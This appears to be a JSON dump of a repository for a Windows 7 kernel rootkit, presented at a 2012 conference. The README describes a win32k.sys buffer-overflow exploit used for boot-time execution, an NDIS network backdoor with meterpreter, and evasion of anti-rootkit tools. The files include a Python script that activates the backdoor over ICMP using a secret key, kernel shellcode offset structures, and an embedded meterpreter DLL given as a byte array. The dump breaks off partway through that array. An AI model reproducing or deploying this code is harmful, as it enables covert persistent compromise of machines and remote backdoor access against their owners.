[
  {
    "path": "README.md",
    "content": "\r\n******************************************************************************\r\n\r\n  Kernel rootkit that lives inside Windows registry value data.  \r\n  By Oleksiuk Dmytro (aka Cr4sh)  \r\n  \r\n  http://twitter.com/d_olex  \r\n  http://blog.cr4.sh  \r\n  cr4sh0@gmail.com  \r\n\r\n******************************************************************************\r\n \r\nThe rootkit uses a zero-day vulnerability in win32k.sys (a buffer overflow in the function win32k!bInitializeEUDC()) to gain execution at OS startup.\r\n \r\nFeatures:\r\n \r\n * NDIS-based network backdoor (+ meterpreter/bind_tcp).\r\n  \r\n * To avoid detection of unknown executable code, it moves itself in memory over discardable sections of some default Windows drivers.\r\n    \r\n * Completely undetectable by public anti-rootkit tools.\r\n  \r\n * Works on Windows 7 (SP0, SP1) x86.\r\n\r\n\r\n ![diagram](https://raw.githubusercontent.com/Cr4sh/blog/master/windows-registry-rootkit/WindowsRegistryRootkit-execution.png)\r\n\r\n \r\nThis rootkit was originally presented during my talk at the ZeroNights 2012 conference.  \r\nSee the slides and videos for more information: https://raw.githubusercontent.com/Cr4sh/blog/master/windows-registry-rootkit/Applied-anti-forensics.pdf\r\n"
  },
  {
    "path": "bin/rootkit_ping.py",
    "content": "#####################################################################\r\n#\r\n# Windows kernrel rootkit PoC using registry values processing BoF.\r\n#\r\n# Script for meterpreter/bind_tcp backdoor activation on TCP/4444 \r\n# port of infected target.\r\n# \r\n# (c) 2012, Oleksiuk Dmytro (aka Cr4sh)\r\n# cr4sh@riseup.net\r\n#\r\n#####################################################################\r\n\r\nimport sys, os\r\nfrom optparse import OptionParser\r\n\r\nBACKDOOR_PORT_NUMBER = 4444\r\nTIMEOUT = 5\r\n\r\ntry:\r\n\r\n    # import scapy stuff\r\n    from scapy.all import *\r\n\r\nexcept Exception, why:\r\n\r\n    print \"[!] Exception while importing module: \" + str(why)\r\n    print \"[!] Scapy (http://www.secdev.org/projects/scapy/) is not installed?\"\r\n    sys.exit()\r\n\r\nif __name__ == '__main__':\r\n\r\n    print \"***********************************************************\\n\"\r\n    print \" Windows kernrel rootkit PoC using registry values processing BoF.\\n\"\r\n    print \" (c) 2012 Oleksiuk Dmytro (aka Cr4sh)\"\r\n    print \" cr4sh@riseup.net\\n\"\r\n    print \"***********************************************************\\n\"\r\n\r\n    parser = OptionParser()\r\n\r\n    parser.add_option(\"-k\", \"--key\", dest = \"key\", default = None,\r\n        help = \"Rootkit secret key.\")\r\n\r\n    parser.add_option(\"-d\", \"--dst\", dest = \"dst\", default = None,\r\n        help = \"Destination host IP address.\")\r\n\r\n    # parse command line\r\n    (options, args) = parser.parse_args()\r\n\r\n    if options.key is None or options.dst is None:\r\n\r\n        print \"[!] 
Please specify --dst and --key options\"\r\n        sys.exit()\r\n\r\n    print \"[+] Destination host IP address: \", options.dst\r\n    print \"[+] Rootkit secret key: \", options.key\r\n    print \"[+] Backdoor port: \", str(BACKDOOR_PORT_NUMBER)\r\n\r\n    # allocate IP + ICMP packets\r\n    ip = IP(dst = options.dst)\r\n    icmp = ICMP(type = 8, code = 0)\r\n    data = \"RKCTL:\" + options.key\r\n\r\n    # send it over the network\r\n    sr1(ip/icmp/data, timeout = TIMEOUT)    \r\n\r\n    # scan for opened backdoor port\r\n    ip = IP(dst = options.dst)\r\n    TCP_SYN = TCP(sport = RandShort(), dport = int(BACKDOOR_PORT_NUMBER), flags = 'S', seq = 40) \r\n    \r\n    # send SYN packet and wait for the first reply\r\n    TCP_SYNACK = sr1(ip/TCP_SYN, timeout = 1) \r\n    \r\n     # SEQ Number for SYN-ACK\r\n    if not TCP_SYNACK or TCP_SYNACK.getlayer(TCP).flags != 0x12:\r\n\r\n        # response from our target aka hostip - expect RST\r\n        print \"[+] Port %d is closed\" % BACKDOOR_PORT_NUMBER\r\n    \r\n    else:\r\n        \r\n        print \"[+] Port %d is opened, use Metasploit for connection to meterpreter/bind_tcp\" % BACKDOOR_PORT_NUMBER\r\n        print \"[+] It will be closed immediately after 'exit' command in meterpreter shell\"\r\n\r\n# if end\r\n\r\n#\r\n# EoF\r\n#\r\n"
  },
  {
    "path": "src/common/catchy32.h",
    "content": "#define\tCATCHY_ERROR\t0xffffffff\r\n\r\n#ifdef __cplusplus\r\nextern \"C\" {\r\n#endif\r\n\tULONG __cdecl c_Catchy(PVOID);\r\n#ifdef __cplusplus\r\n}\r\n#endif\r\n"
  },
  {
    "path": "src/common/common.h",
    "content": "\r\n#define TIME_ABSOLUTE(wait) (wait)\r\n#define TIME_RELATIVE(wait) (-(wait))\r\n#define TIME_NANOSECONDS(nanos) (((signed __int64)(nanos)) / 100L)\r\n#define TIME_MICROSECONDS(micros) (((signed __int64)(micros)) * TIME_NANOSECONDS(1000L))\r\n#define TIME_MILLISECONDS(milli) (((signed __int64)(milli)) * TIME_MICROSECONDS(1000L))\r\n#define TIME_SECONDS(seconds) (((signed __int64)(seconds)) * TIME_MILLISECONDS(1000L))\r\n\r\n#define RVATOVA(_base_, _offset_) ((PUCHAR)(_base_) + (ULONG)(_offset_))\r\n\r\n#define MY_ALIGN_DOWN(_val_, _align_) ((_val_) &~ ((_align_) - 1))\r\n#define MY_ALIGN_UP(_val_, _align_) (((_val_) & ((_align_) - 1)) ? MY_ALIGN_DOWN((_val_), (_align_)) + (_align_) : (_val_))\r\n\r\n#define IFMT32 \"0x%.8x\"\r\n#define IFMT64 \"0x%.16I64x\"\r\n\r\n\r\n#define GET_NATIVE(_name_)                                      \\\r\n                                                                \\\r\n    func_##_name_ f_##_name_ = (func_##_name_)GetProcAddress(   \\\r\n        GetModuleHandle(\"ntdll.dll\"),                           \\\r\n        (#_name_)                                               \\\r\n    );\r\n\r\n#if defined(_X86_)\r\n\r\n#define IFMT IFMT32\r\n\r\n#elif defined(_AMD64_)\r\n\r\n#define IFMT IFMT64\r\n\r\n#endif\r\n"
  },
  {
    "path": "src/common/debug.cpp",
    "content": "#include \"stdafx.h\"\r\n//--------------------------------------------------------------------------------------\r\n#ifdef DBG\r\n//--------------------------------------------------------------------------------------\r\nchar *GetNameFromFullPath(char *lpszPath)\r\n{\r\n    char *lpszName = lpszPath;\r\n\r\n    for (int i = 0; i < lstrlenA(lpszPath); i++)\r\n    {\r\n        if (lpszPath[i] == '\\\\' || lpszPath[i] == '/')\r\n        {\r\n            lpszName = lpszPath + i + 1;\r\n        }\r\n    }\r\n\r\n    return lpszName;\r\n}\r\n//--------------------------------------------------------------------------------------\r\ntypedef int (__cdecl * func_sprintf)(LPSTR, LPCSTR, ...);\r\ntypedef int (__cdecl * func_vsprintf)(LPSTR, LPCSTR, va_list arglist);\r\ntypedef int (__cdecl * func__vscprintf)(const char *format, va_list argptr);\r\n\r\nvoid DbgMsg(char *lpszFile, int Line, char *lpszMsg, ...)\r\n{\r\n    va_list mylist;\r\n    va_start(mylist, lpszMsg);\r\n\r\n    func_sprintf f_sprintf = (func_sprintf)GetProcAddress(\r\n        LoadLibraryA(\"msvcrt.dll\"),\r\n        \"sprintf\"\r\n    );\r\n    if (f_sprintf == NULL)\r\n    {\r\n        return;\r\n    }\r\n\r\n    func_vsprintf f_vsprintf = (func_vsprintf)GetProcAddress(\r\n        LoadLibraryA(\"msvcrt.dll\"),\r\n        \"vsprintf\"\r\n    );\r\n    if (f_vsprintf == NULL)\r\n    {\r\n        return;\r\n    }\r\n\r\n    func__vscprintf f__vscprintf = (func__vscprintf)GetProcAddress(\r\n        LoadLibraryA(\"msvcrt.dll\"),\r\n        \"_vscprintf\"\r\n    );\r\n    if (f__vscprintf == NULL)\r\n    {\r\n        return;\r\n    }\r\n\r\n    size_t len = f__vscprintf(lpszMsg, mylist) + 0x100;\r\n\r\n    char *lpszBuff = (char *)LocalAlloc(LMEM_FIXED, len);\r\n    if (lpszBuff == NULL)\r\n    {\r\n        va_end(mylist);\r\n        return;\r\n    }\r\n\r\n    char *lpszOutBuff = (char *)LocalAlloc(LMEM_FIXED, len);\r\n    if (lpszOutBuff == NULL)\r\n    {\r\n        LocalFree(lpszBuff);\r\n   
     va_end(mylist);\r\n        return;\r\n    }\r\n\r\n    f_vsprintf(lpszBuff, lpszMsg, mylist);\t\r\n    va_end(mylist);\r\n\r\n    f_sprintf(\r\n        lpszOutBuff, \"[%.5d] .\\\\%s(%d) : %s\", \r\n        GetCurrentProcessId(), GetNameFromFullPath(lpszFile), Line, lpszBuff\r\n    );\r\n\r\n    OutputDebugStringA(lpszOutBuff);\r\n\r\n    HANDLE hStd = GetStdHandle(STD_OUTPUT_HANDLE);\r\n    if (hStd != INVALID_HANDLE_VALUE)\r\n    {\r\n        DWORD dwWritten = 0;\r\n        WriteFile(hStd, lpszBuff, lstrlenA(lpszBuff), &dwWritten, NULL);    \r\n    }\r\n\r\n    LocalFree(lpszOutBuff);\r\n    LocalFree(lpszBuff);\r\n}\r\n//--------------------------------------------------------------------------------------\r\n#endif DBG\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n"
  },
  {
    "path": "src/common/debug.h",
    "content": "#ifdef DBG\r\n\r\nvoid DbgMsg(char *lpszFile, int Line, char *lpszMsg, ...);\r\n\r\n#else\r\n\r\n#define DbgMsg\r\n\r\n#endif\r\n"
  },
  {
    "path": "src/common/ntdll_defs.h",
    "content": "typedef LONG NTSTATUS; \r\n\r\ntypedef struct _IO_STATUS_BLOCK \r\n{\r\n    union {\r\n        NTSTATUS Status;\r\n        PVOID Pointer;\r\n    };\r\n    ULONG_PTR Information;\r\n\r\n} IO_STATUS_BLOCK, \r\n*PIO_STATUS_BLOCK;\r\n\r\n#undef UNICODE_STRING\r\n\r\ntypedef struct _UNICODE_STRING \r\n{\r\n    USHORT Length;\r\n    USHORT MaximumLength;\r\n    PWSTR Buffer;\r\n\r\n} UNICODE_STRING, \r\n*PUNICODE_STRING;\r\n\r\ntypedef struct _STRING \r\n{\r\n    USHORT Length;\r\n    USHORT MaximumLength;\r\n    PCHAR Buffer;\r\n  \r\n} ANSI_STRING, \r\n*PANSI_STRING;\r\n\r\ntypedef struct _CLIENT_ID \r\n{\r\n    HANDLE UniqueProcess;\r\n    HANDLE UniqueThread;\r\n\r\n} CLIENT_ID,\r\n*PCLIENT_ID;\r\n\r\n#define OBJ_INHERIT                     0x00000002\r\n#define OBJ_PERMANENT                   0x00000010\r\n#define OBJ_EXCLUSIVE                   0x00000020\r\n#define OBJ_CASE_INSENSITIVE            0x00000040\r\n#define OBJ_OPENIF                      0x00000080\r\n#define OBJ_OPENLINK                    0x00000100\r\n#define OBJ_VALID_ATTRIBUTES            0x000001F2\r\n\r\ntypedef struct _OBJECT_ATTRIBUTES\r\n{\r\n    ULONG Length;\r\n    HANDLE RootDirectory;\r\n    PUNICODE_STRING    ObjectName;\r\n    ULONG Attributes;\r\n    PVOID SecurityDescriptor;\r\n    PVOID SecurityQualityOfService;\r\n\r\n} OBJECT_ATTRIBUTES, \r\n*POBJECT_ATTRIBUTES;\r\n\r\n#define InitializeObjectAttributes( p, n, a, r, s ) {   \\\r\n    (p)->Length = sizeof( OBJECT_ATTRIBUTES );          \\\r\n    (p)->RootDirectory = r;                             \\\r\n    (p)->Attributes = a;                                \\\r\n    (p)->ObjectName = n;                                \\\r\n    (p)->SecurityDescriptor = s;                        \\\r\n    (p)->SecurityQualityOfService = NULL;               \\\r\n}\r\n\r\n#define NT_SUCCESS(Status) ((LONG)(Status) >= 0)\r\n#define NT_ERROR(Status) ((ULONG)(Status) >> 30 == 3)\r\n\r\n#define NtCurrentProcess() 
((HANDLE)-1)\r\n\r\n#ifndef STATUS_BUFFER_OVERFLOW\r\n#define STATUS_BUFFER_OVERFLOW           ((NTSTATUS)0x80000005L) \r\n#endif\r\n\r\n#ifndef STATUS_NO_MORE_FILES\r\n#define STATUS_NO_MORE_FILES             ((NTSTATUS)0x80000006L)\r\n#endif\r\n\r\n#ifndef STATUS_INFO_LENGTH_MISMATCH\r\n#define STATUS_INFO_LENGTH_MISMATCH      ((NTSTATUS)0xC0000004L)\r\n#endif\r\n\r\n#ifndef STATUS_BUFFER_TOO_SMALL \r\n#define STATUS_BUFFER_TOO_SMALL          ((NTSTATUS)0xC0000023L)\r\n#endif\r\n\r\n#ifndef STATUS_UNSUCCESSFUL\r\n#define STATUS_UNSUCCESSFUL              ((NTSTATUS)0xC0000001L)\r\n#endif\r\n"
  },
  {
    "path": "src/common/shellcode2_struct.h",
    "content": "\r\n#define DBGPRINT_MESSAGE \"YOU GOT PWND!\\n\"\r\n#define DBGPRINT_MESSAGE_LEN 0x20\r\n\r\ntypedef struct _SC_PARAMS\r\n{\r\n    PVOID kernel_base;\r\n    PVOID win32k_base;\r\n\r\n    ULONG rootkit_size;\r\n    PVOID rootkit_base;\r\n\r\n    ULONG offset_MmIsAddressValid;\r\n    ULONG offset_PsGetCurrentProcess;\r\n    ULONG offset_PsGetProcessWin32Process;\r\n    ULONG offset_ExAllocatePool;\r\n    ULONG offset_RtlQueryRegistryValues;\r\n    ULONG offset_UserInitialize;\r\n    ULONG offset_bInitializeEUDC_patch;\r\n\r\n#ifdef USE_SHELLCODE_DBGPRINT\r\n\r\n    ULONG offset_DbgPrint;\r\n    char szDbgPrintMessage[DBGPRINT_MESSAGE_LEN];\r\n\r\n#endif\r\n\r\n} SC_PARAMS,\r\n*PSC_PARAMS;\r\n\r\n/**\r\n * Offsets for SC_PARAMS fields.\r\n */\r\n#define _kernel_base                0x00\r\n#define _win32k_base                0x04\r\n#define _rootkit_size               0x08\r\n#define _rootkit_base               0x0c\r\n\r\n#define _MmIsAddressValid           0x10\r\n#define _PsGetCurrentProcess        0x14\r\n#define _PsGetProcessWin32Process   0x18\r\n#define _ExAllocatePool             0x1c\r\n\r\n#define _RtlQueryRegistryValues     0x20\r\n#define _UserInitialize             0x24\r\n#define _bInitializeEUDC_patch      0x28\r\n#define _DbgPrint                   0x2c\r\n\r\n#define _szDbgPrintMessage          0x30\r\n\r\n#define SHELLCODE_2_MAX_BUFF_SIZE 0x300\r\n"
  },
  {
    "path": "src/common/undocnt.h",
    "content": "\r\n/************************************************************/\r\n/*                                                          */ \r\n/*  Some structures for native API functions                */\r\n/*                                                          */\r\n/************************************************************/\r\n\r\ntypedef enum _SYSTEM_INFORMATION_CLASS \r\n{\r\n    SystemBasicInformation,\r\n    SystemProcessorInformation,             // obsolete...delete\r\n    SystemPerformanceInformation,\r\n    SystemTimeOfDayInformation,\r\n    SystemPathInformation,\r\n    SystemProcessInformation,\r\n    SystemCallCountInformation,\r\n    SystemDeviceInformation,\r\n    SystemProcessorPerformanceInformation,\r\n    SystemFlagsInformation,\r\n    SystemCallTimeInformation,\r\n    SystemModuleInformation,\r\n    SystemLocksInformation,\r\n    SystemStackTraceInformation,\r\n    SystemPagedPoolInformation,\r\n    SystemNonPagedPoolInformation,\r\n    SystemHandleInformation,\r\n    SystemObjectInformation,\r\n    SystemPageFileInformation,\r\n    SystemVdmInstemulInformation,\r\n    SystemVdmBopInformation,\r\n    SystemFileCacheInformation,\r\n    SystemPoolTagInformation,\r\n    SystemInterruptInformation,\r\n    SystemDpcBehaviorInformation,\r\n    SystemFullMemoryInformation,\r\n    SystemLoadGdiDriverInformation,\r\n    SystemUnloadGdiDriverInformation,\r\n    SystemTimeAdjustmentInformation,\r\n    SystemSummaryMemoryInformation,\r\n    SystemMirrorMemoryInformation,\r\n    SystemPerformanceTraceInformation,\r\n    SystemObsolete0,\r\n    SystemExceptionInformation,\r\n    SystemCrashDumpStateInformation,\r\n    SystemKernelDebuggerInformation,\r\n    SystemContextSwitchInformation,\r\n    SystemRegistryQuotaInformation,\r\n    SystemExtendServiceTableInformation,\r\n    SystemPrioritySeperation,\r\n    SystemVerifierAddDriverInformation,\r\n    SystemVerifierRemoveDriverInformation,\r\n    SystemProcessorIdleInformation,\r\n    
SystemLegacyDriverInformation,\r\n    SystemCurrentTimeZoneInformation,\r\n    SystemLookasideInformation,\r\n    SystemTimeSlipNotification,\r\n    SystemSessionCreate,\r\n    SystemSessionDetach,\r\n    SystemSessionInformation,\r\n    SystemRangeStartInformation,\r\n    SystemVerifierInformation,\r\n    SystemVerifierThunkExtend,\r\n    SystemSessionProcessInformation,\r\n    SystemLoadGdiDriverInSystemSpace,\r\n    SystemNumaProcessorMap,\r\n    SystemPrefetcherInformation,\r\n    SystemExtendedProcessInformation,\r\n    SystemRecommendedSharedDataAlignment,\r\n    SystemComPlusPackage,\r\n    SystemNumaAvailableMemory,\r\n    SystemProcessorPowerInformation,\r\n    SystemEmulationBasicInformation,\r\n    SystemEmulationProcessorInformation,\r\n    SystemExtendedHandleInformation,\r\n    SystemLostDelayedWriteInformation,\r\n    SystemBigPoolInformation,\r\n    SystemSessionPoolTagInformation,\r\n    SystemSessionMappedViewInformation,\r\n    SystemHotpatchInformation,\r\n    SystemObjectSecurityMode,\r\n    SystemWatchdogTimerHandler,\r\n    SystemWatchdogTimerInformation,\r\n    SystemLogicalProcessorInformation,\r\n    SystemWow64SharedInformation,\r\n    SystemRegisterFirmwareTableInformationHandler,\r\n    SystemFirmwareTableInformation,\r\n    SystemModuleInformationEx,\r\n    SystemVerifierTriageInformation,\r\n    SystemSuperfetchInformation,\r\n    SystemMemoryListInformation,\r\n    SystemFileCacheInformationEx,\r\n    MaxSystemInfoClass  // MaxSystemInfoClass should always be the last enum\r\n\r\n} SYSTEM_INFORMATION_CLASS;\r\n\r\ntypedef struct _RTL_PROCESS_MODULE_INFORMATION \r\n{\r\n    HANDLE Section;                 // Not filled in\r\n    PVOID MappedBase;\r\n    PVOID ImageBase;\r\n    ULONG ImageSize;\r\n    ULONG Flags;\r\n    USHORT LoadOrderIndex;\r\n    USHORT InitOrderIndex;\r\n    USHORT LoadCount;\r\n    USHORT OffsetToFileName;\r\n    UCHAR  FullPathName[ 256 ];\r\n\r\n} RTL_PROCESS_MODULE_INFORMATION, 
\r\n*PRTL_PROCESS_MODULE_INFORMATION;\r\n\r\ntypedef struct _RTL_PROCESS_MODULES \r\n{\r\n    ULONG NumberOfModules;\r\n    RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];\r\n\r\n} RTL_PROCESS_MODULES, \r\n*PRTL_PROCESS_MODULES;\r\n\r\ntypedef enum _SHUTDOWN_ACTION \r\n{\r\n    ShutdownNoReboot,\r\n    ShutdownReboot,\r\n    ShutdownPowerOff\r\n\r\n} SHUTDOWN_ACTION, \r\n*PSHUTDOWN_ACTION;\r\n\r\ntypedef struct _DIRECTORY_BASIC_INFORMATION \r\n{\r\n    UNICODE_STRING ObjectName;\r\n    UNICODE_STRING ObjectTypeName;\r\n\r\n} DIRECTORY_BASIC_INFORMATION, \r\n*PDIRECTORY_BASIC_INFORMATION;\r\n\r\ntypedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO \r\n{\r\n    USHORT UniqueProcessId;\r\n    USHORT CreatorBackTraceIndex;\r\n    UCHAR ObjectTypeIndex;\r\n    UCHAR HandleAttributes;\r\n    USHORT HandleValue;\r\n    PVOID Object;\r\n    ULONG GrantedAccess;\r\n\r\n} SYSTEM_HANDLE_TABLE_ENTRY_INFO, \r\n*PSYSTEM_HANDLE_TABLE_ENTRY_INFO;\r\n\r\ntypedef struct _SYSTEM_HANDLE_INFORMATION \r\n{\r\n    ULONG NumberOfHandles;\r\n    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[ 1 ];\r\n\r\n} SYSTEM_HANDLE_INFORMATION, \r\n*PSYSTEM_HANDLE_INFORMATION;\r\n\r\n/************************************************************/\r\n/*                                                          */ \r\n/*  Prototypes for native and kernel API functions          */\r\n/*                                                          */\r\n/************************************************************/\r\n\r\ntypedef enum _KPROFILE_SOURCE \r\n{\r\n    ProfileTime,\r\n    ProfileAlignmentFixup,\r\n    ProfileTotalIssues,\r\n    ProfilePipelineDry,\r\n    ProfileLoadInstructions,\r\n    ProfilePipelineFrozen,\r\n    ProfileBranchInstructions,\r\n    ProfileTotalNonissues,\r\n    ProfileDcacheMisses,\r\n    ProfileIcacheMisses,\r\n    ProfileCacheMisses,\r\n    ProfileBranchMispredictions,\r\n    ProfileStoreInstructions,\r\n    ProfileFpInstructions,\r\n    ProfileIntegerInstructions,\r\n    Profile2Issue,\r\n    
Profile3Issue,\r\n    Profile4Issue,\r\n    ProfileSpecialInstructions,\r\n    ProfileTotalCycles,\r\n    ProfileIcacheIssues,\r\n    ProfileDcacheAccesses,\r\n    ProfileMemoryBarrierCycles,\r\n    ProfileLoadLinkedIssues,\r\n    ProfileMaximum\r\n\r\n} KPROFILE_SOURCE, \r\n*PKPROFILE_SOURCE;\r\n\r\ntypedef NTSTATUS (WINAPI * func_NtQueryIntervalProfile)(\r\n    KPROFILE_SOURCE ProfileSource,\r\n    PULONG Interval\r\n);\r\n\r\ntypedef NTSTATUS (WINAPI * func_NtQuerySystemInformation)(\r\n    SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n    PVOID SystemInformation,\r\n    ULONG SystemInformationLength,\r\n    PULONG ReturnLength\r\n);\r\n\r\ntypedef CCHAR KPROCESSOR_MODE;\r\n\r\ntypedef enum _MODE \r\n{\r\n    KernelMode,\r\n    UserMode,\r\n    MaximumMode\r\n\r\n} MODE;\r\n\r\ntypedef NTSTATUS (WINAPI * func_NtAllocateVirtualMemory)(\r\n    HANDLE ProcessHandle,\r\n    PVOID *BaseAddress,\r\n    ULONG_PTR ZeroBits,\r\n    PSIZE_T RegionSize,\r\n    ULONG AllocationType,\r\n    ULONG Protect \r\n);\r\n\r\ntypedef NTSTATUS (WINAPI * func_KeDelayExecutionThread)(\r\n    KPROCESSOR_MODE WaitMode,\r\n    BOOLEAN Alertable,\r\n    PLARGE_INTEGER Interval\r\n);\r\n\r\ntypedef VOID (WINAPI * func_KeUnstackDetachProcess)(\r\n    PVOID ApcState\r\n);\r\n\r\ntypedef enum _POOL_TYPE \r\n{\r\n    NonPagedPool,\r\n    PagedPool\r\n\r\n} POOL_TYPE;\r\n\r\ntypedef PVOID (WINAPI * func_ExAllocatePool)(\r\n    POOL_TYPE PoolType, \r\n    SIZE_T NumberOfBytes\r\n);\r\n\r\ntypedef HANDLE (WINAPI * func_PsGetCurrentProcessId)(VOID);\r\ntypedef HANDLE (WINAPI * func_PsGetCurrentThreadId)(VOID);\r\ntypedef PVOID (WINAPI * func_PsGetCurrentThread)(VOID);\r\n\r\ntypedef NTSTATUS (WINAPI * func_ZwOpenThread)(\r\n    PHANDLE ThreadHandle,\r\n    ACCESS_MASK DesiredAccess,\r\n    POBJECT_ATTRIBUTES ObjectAttributes,\r\n    PCLIENT_ID ClientId\r\n);\r\n\r\ntypedef VOID (WINAPI * func_RtlInitUnicodeString)(\r\n    PUNICODE_STRING DestinationString,\r\n    PCWSTR 
SourceString\r\n);\r\n\r\ntypedef VOID (WINAPI * func_RtlInitAnsiString)(\r\n    PANSI_STRING DestinationString,\r\n    PCSTR SourceString\r\n);\r\n\r\ntypedef NTSTATUS (WINAPI * func_RtlAnsiStringToUnicodeString)(\r\n    PUNICODE_STRING DestinationString,\r\n    PANSI_STRING SourceString,\r\n    BOOLEAN AllocateDestinationString\r\n);\r\n\r\ntypedef BOOLEAN (WINAPI * func_RtlEqualUnicodeString)(\r\n    UNICODE_STRING *String1,\r\n    UNICODE_STRING *String2,\r\n    BOOLEAN CaseInSensitive\r\n);\r\n\r\ntypedef VOID (WINAPI * func_RtlFreeUnicodeString)(\r\n    PUNICODE_STRING UnicodeString\r\n);\r\n\r\ntypedef NTSTATUS (WINAPI * func_NtOpenFile)(\r\n    PHANDLE FileHandle,\r\n    ACCESS_MASK DesiredAccess,\r\n    POBJECT_ATTRIBUTES ObjectAttributes,\r\n    PIO_STATUS_BLOCK IoStatusBlock,\r\n    ULONG ShareAccess,\r\n    ULONG OpenOptions\r\n);\r\n\r\ntypedef VOID (__fastcall * func_IofCompleteRequest)(\r\n    struct _IRP *Irp,\r\n    CCHAR PriorityBoost\r\n);\r\n\r\ntypedef NTSTATUS (WINAPI * func_PsLookupProcessByProcessId)(\r\n    HANDLE ProcessId,\r\n    PVOID *Process\r\n);\r\n"
  },
  {
    "path": "src/includes/meterpreter_debug.dll.h",
    "content": "// 5632 bytes readed form ..\\meterpreter_debug.dll...\r\nunsigned char dll[] =\r\n{\r\n0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff,0xff,0x00,0x00,\r\n0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x00,0x00,0x00,\r\n0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68,\r\n0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f,\r\n0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20,\r\n0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x11,0xcb,0xaf,0x83,0x55,0xaa,0xc1,0xd0,0x55,0xaa,0xc1,0xd0,0x55,0xaa,0xc1,0xd0,\r\n0x72,0x6c,0xba,0xd0,0x52,0xaa,0xc1,0xd0,0x55,0xaa,0xc0,0xd0,0x4c,0xaa,0xc1,0xd0,\r\n0x5c,0xd2,0x45,0xd0,0x51,0xaa,0xc1,0xd0,0x5c,0xd2,0x53,0xd0,0x54,0xaa,0xc1,0xd0,\r\n0x5c,0xd2,0x50,0xd0,0x54,0xaa,0xc1,0xd0,0x52,0x69,0x63,0x68,0x55,0xaa,0xc1,0xd0,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x50,0x45,0x00,0x00,0x4c,0x01,0x04,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0xe0,0x00,0x02,0x21,0x0b,0x01,0x09,0x00,0x00,0x06,0x00,0x00,\r\n0x00,0x0c,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x12,0x00,0x00,0x00,0x10,0x00,0x00,\r\n0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,\r\n0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x50,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x40,0x05,\r\n0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x60,0x26,0x00,0x00,0x4e,0x00,0x00,0x00,\r\n0xd8,0x23,0x00,0x00,0x50,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0
0,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x40,0x00,0x00,0xc8,0x00,0x00,0x00,0x70,0x20,0x00,0x00,0x1c,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x70,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00,\r\n0x76,0x05,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x06,0x00,0x00,0x00,0x04,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60,\r\n0x2e,0x72,0x64,0x61,0x74,0x61,0x00,0x00,0x11,0x07,0x00,0x00,0x00,0x20,0x00,0x00,\r\n0x00,0x08,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2e,0x64,0x61,0x74,0x61,0x00,0x00,0x00,\r\n0x2b,0x01,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x12,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xc0,\r\n0x2e,0x72,0x65,0x6c,0x6f,0x63,0x00,0x00,0xde,0x00,0x00,0x00,0x00,0x40,0x00,0x00,\r\n0x00,0x02,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0